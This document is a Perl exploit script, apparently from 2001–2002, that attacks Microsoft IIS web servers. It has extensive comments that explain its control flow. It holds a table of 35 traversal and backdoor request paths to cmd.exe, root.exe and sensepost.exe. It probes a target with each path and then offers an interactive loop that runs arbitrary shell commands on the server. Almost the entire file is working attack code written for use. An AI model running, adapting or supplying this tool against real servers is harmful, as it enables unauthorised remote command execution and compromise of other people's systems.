#!/usr/bin/perl -w
################################################################
#   WARNING!                                                   #
# THIS SCRIPT CAN RUN ON WINDOWS MACHINE ONLY (with ActivePerl)#
# IT CANNOT BE USED ON A UNIX-BASED MACHINE!!!!                #
################################################################
# State-of-the-art PERL script to execute commands
# on IIS vulnerable servers using 35 ways 
# (like unicode Codered and some other backdoor)
# Use port number with SSLproxy for testing SSL sites
# Andrea Spabam 2001 GPL2 or higher
# spabam@go.to http://spabam.da.ru

use strict;
use IO::Socket;

# Globals Go Here.  Every sub below reads and writes these file-scoped
# lexicals directly; nothing is passed as an argument or returned.
my $host;		# Host being probed (set by &host; "" becomes "localhost").
my $port;		# Webserver port (set by &host; "" or non-numeric becomes "80").
my $command;		# Command to issue: "dir" during &scan, a STDIN line in &command.
my $url;		# URL being used: the @U entry selected by &scan or &choose.
my @results;		# Response lines collected by &connect (its read loop drops the first line).
my $probe;		# Probe mode: "string", "scan" or "command"; picks the request and the display.
my @U;			# Unicode URLS.  Index 0 is the custom slot filled in by &other.

# URLS - Feel free to add here.
# $U[0] always used for custom URL.
# Each entry is a request path that &connect completes by appending
# $command verbatim (no encoding is applied there).  &scan walks indices
# 1 .. $#U in this order, so the "URL Number" it reports is the index
# below, and &choose accepts the same index.  The "# END ... TEST" lines
# mark the groups.  In $U[14] the backslashes before %, ? and + are
# passed through by the double-quoted string as the bare characters
# (-w reports them as unrecognized escapes); they change nothing.
$U[1] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[2] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[3] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[4] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[5] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[6] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[7] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[8] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[9] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[10] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[11] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[12] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[13] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[14] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+";
$U[15] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[16] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[17] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[18] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[20] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
# END UNICODE TEST
$U[21] = "/scripts/root.exe?/c+";
$U[22] = "/msadc/root.exe?c+";
# END CODERED TEST
$U[23] = "/cgi-bin/root.exe?/c+";
$U[24] = "/samples/root.exe?/c+";
$U[25] = "/iisadmpwd/root.exe?/c+";
$U[26] = "/_vti_cnf/root.exe?/c+";
$U[27] = "/_vti_bin/root.exe?/c+";
$U[28] = "/adsamples/root.exe?/c+";
$U[29] = "/scripts/cmd.exe?/c+";
$U[30] = "/scripts/cmd.exe?/c+";
$U[31] = "/cmd.exe?/c+";
$U[32] = "/root.exe?/c+";
# END ROOT-BACKDOOR TEST
$U[33] = "/sensepost.exe?/c+";
$U[34] = "/scripts/sensepost.exe?/c+";
# END SENSEPOST (unicodeloader) BACKDOOR TEST
$U[35] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
# END IIS CGI DECODE ERROR TEST

# MAIN PROGRAM FLOW GOES HERE.  SUBROUTINES FOLLOW BELOW.
# Main flow: banner and target prompt, automatic scan, URL choice, then the
# interactive command loop.  The last call keeps the & sigil on purpose:
# "exit" is also a Perl builtin, and only the &exit form reaches the sub
# defined in this file (a bare exit() would be CORE::exit).
intro();
scan();
choose();
command();
&exit;

# Start-up sequence: banner, host/port prompt, server-string check, then a
# short pause so the result stays visible before &scan prints its run of
# blank lines.
sub intro {
    help();
    host();
    server();
    sleep 3;
}

# host subroutine.
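# Prompts for the target host and port and stores them in the globals
# $host and $port.  An empty host becomes "localhost"; an empty or
# non-numeric port becomes "80".  An EOF on STDIN is treated like an empty
# answer instead of leaving the variables undefined (the original chomped
# and compared undef, which only produced -w warnings before falling
# through to the same defaults).
sub host {
    print "\nHost : ";
    $host = <STDIN>;
    $host = "" unless defined $host;    # EOF -> same as an empty answer
    chomp $host;
    $host = "localhost" if $host eq "";

    print "\nPort : ";
    $port = <STDIN>;
    $port = "" unless defined $port;
    chomp $port;
    # Anything containing a non-digit, or nothing at all, falls back to 80.
    $port = "80" if $port eq "" || $port =~ /\D/;
}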

# Server string subroutine.
# Sends a HEAD request through &connect (with $probe = "string") and looks
# for "IIS" in the first 11 lines (indices 0..10) of @results, the same
# window &output displays for this probe.  If the marker is absent the
# user is asked whether to continue; an answer containing N ends the run
# through &exit.
sub server {
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    print "\nTrying to obtain IIS Server string ...";
    $probe = "string";
    &connect;    # & form on purpose: "connect" is also a Perl builtin

    # Rvalue slice: missing slots come back undef and are skipped.
    my $iis_seen = grep { defined $_ && /IIS/ } @results[0 .. 10];

    if ($iis_seen) {
        print "\n\nOK ... It Seems To Be Micro\$oft IIS.";
    }
    else {
        print "\a\a\n\nWARNING : UNABLE TO GET IIS SERVER STRING.";
        print "\nThis Server may not be running Micro\$oft IIS WebServer";
        print "\nand therefore may not be exploitable using the";
        print "\nUnicode Bug.";
        print "\n\n\nDo You Wish To Cont ... [Y/N]";
        my $answer = <STDIN>;
        chomp $answer;
        &exit if $answer =~ /N/i;
    }
}

# scan subroutine.
# Tries every table entry from index 1 to $#U (0 is the custom slot) with
# $command = "dir" and $probe = "scan", one &connect per entry.  Any
# response line containing "Directory" counts that entry as a hit and is
# reported with the entry's index.  If nothing hits, the run ends via
# &exit.  Side effects: $command stays "dir" and $url keeps the last entry
# tried, which &command relies on afterwards.
sub scan {
    my $any_hit = 0;
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    print "\nScanning Webserver $host on port $port ...";
    $command = "dir";

    for my $index (1 .. $#U) {
        $url   = $U[$index];
        $probe = "scan";
        &connect;    # & form on purpose: "connect" is also a Perl builtin

        my $hits = grep { /Directory/ } @results;
        if ($hits) {
            $any_hit = 1;
            print "\a\a\a\n$host IS VULNERABLE TO URL NUMBER $index !!!";
        }
        else {
            print "\n$host is not vulnerable to URL Number $index.";
        }
    }

    unless ($any_hit) {
        print "\n\nSORRY $host is NOT Vulnerable to the Exploit.";
        &exit;
    }
}

# choose URL subroutine.
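# Prompts for an index into @U and stores that entry in $url.  Index 0
# hands over to &other so the user can type a custom path first.  Input is
# re-prompted until it is a plain non-negative integer no larger than $#U.
# The original recursed on bad input but then fell through and assigned
# $U[$choice] with the rejected value (and accepted $choice == @U, one past
# the last entry); the loop below removes both problems.  EOF on STDIN
# ends the program through &exit, as QUIT does.
sub choose {
    my $choice;
    while (1) {
        print "\nURL To Use [0 = Other]: ";
        $choice = <STDIN>;
        &exit unless defined $choice;    # &exit, not CORE::exit: user sub below
        chomp $choice;
        last if $choice =~ /\A\d+\z/ && $choice <= $#U;
        print "\nInvalid choice, enter a number between 0 and $#U.";
    }
    &other if $choice == 0;
    $url = $U[$choice];
    print "\nURL: HTTP://$host$url";
}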

# Other URL subroutine.
# Reads a custom request path from STDIN into the custom slot $U[0].  The
# prompt shows the expected shape; the command part is appended later by
# &connect.
sub other {
    print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
    print "\nHTTP://$host";
    chomp(my $custom_path = <STDIN>);
    $U[0] = $custom_path;
}

# Command subroutine.
# Interactive loop: reads a line from STDIN into the global $command and
# dispatches on it.  QUIT ends the program, URL re-runs &choose, SCAN
# re-runs &scan, HELP prints the banner; anything else is appended to $url
# and sent through &connect.  Notes on the control flow as written:
#   - the keyword tests are case-insensitive but the final
#     "!~/quit|url|scan|help/" guard is case-sensitive, so an upper-case
#     keyword (the spelling the prompt itself shows) is dispatched AND
#     then also sent to the server as a command;
#   - &scan resets $command to "dir", so after SCAN that "dir" passes the
#     guard and produces one more request;
#   - EOF on STDIN leaves $command undefined, which never matches /quit/i,
#     so the loop keeps prompting;
#   - on entry $command already holds the value left by &scan ("dir"), so
#     the while test is true the first time.
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\nCommand :";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; # whitespace becomes '+' (query-string spacing); it is not removed.
print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
# Only reached when $command matched /quit/i at the loop test; the QUIT
# branch above normally exits first.
&exit;
};  # end command subroutine.

# Connect subroutine.
# Opens a TCP connection to $host:$port, sends one HTTP/1.0 request built
# from the globals, collects the response into @results and, for the
# "command" and "string" probes, hands it to &output ("scan" leaves the
# display to &scan).  A failed connection is fatal: die ends the program
# without the &exit sign-off.  No Timeout option is passed to
# IO::Socket::INET, so the connect and every read block without limit.
# Request shape by $probe:
#   "command" / "scan"  ->  GET $url$command   ($url and $command are
#                           interpolated verbatim; nothing is encoded here)
#   "string"            ->  HEAD /
# "connect" is also a Perl builtin; callers use the &connect form so this
# sub, not CORE::connect, is the one invoked.
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

# Read loop: the line read by the while test (normally the HTTP status
# line) is discarded; the list assignment then slurps every remaining line
# into @results, after which the next test hits EOF and the loop ends.  A
# one-line response therefore leaves @results empty.
while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
# "scan" results are inspected by the caller; the other probes are shown here.
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  # end connect subroutine.

# output subroutine.
# Prints @results for $host, one line per second.  For the "string" probe
# only the first 11 slots (indices 0..10) are shown, with the one-second
# pause taken for every slot whether or not it holds a line; every other
# probe echoes the whole array.
sub output {
    print "\nOUTPUT FROM $host. \n\n";
    if ($probe eq "string") {
        for my $slot (0 .. 10) {
            my $line = $results[$slot];
            print $line if defined $line;
            sleep 1;
        }
    }
    else {
        for my $line (@results) {
            print $line;
            sleep 1;
        }
    }
}

# exit subroutine.
# Prints the sign-off and terminates the process.  The sub deliberately
# shares its name with the builtin: callers reach it with &exit, while the
# process is ended with CORE::exit so the call is unambiguous (a bare
# "exit;" here resolves to the builtin too, but -w flags it as an
# ambiguous call).
sub exit {
    print "\n\n\nANDREA SPABAM 2002#.", "\nspabam.da.ru spabam\@go.to", "\n\n\n";
    CORE::exit;
}

# Help subroutine.
# Prints the banner and the keywords accepted at the command prompt.  The
# leading run of newlines pushes earlier output off a small console.
sub help {
    my @banner = (
        "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
        "\n IIS-PLUS shell by SPABAM. 2002. spabam\@go.to",
        "\n",
        "\n A IIS HTTP exploit for Micro\$oft WebServers using 35 URL.",
        "\n",
        "\n Command: SCAN URL HELP QUIT",
        "\n note.. web directory is normally c:\\Inetpub\\wwwroot",
        "\n\n\n",
    );
    print @banner;
}


# Another fine spabam.da.ru production ...

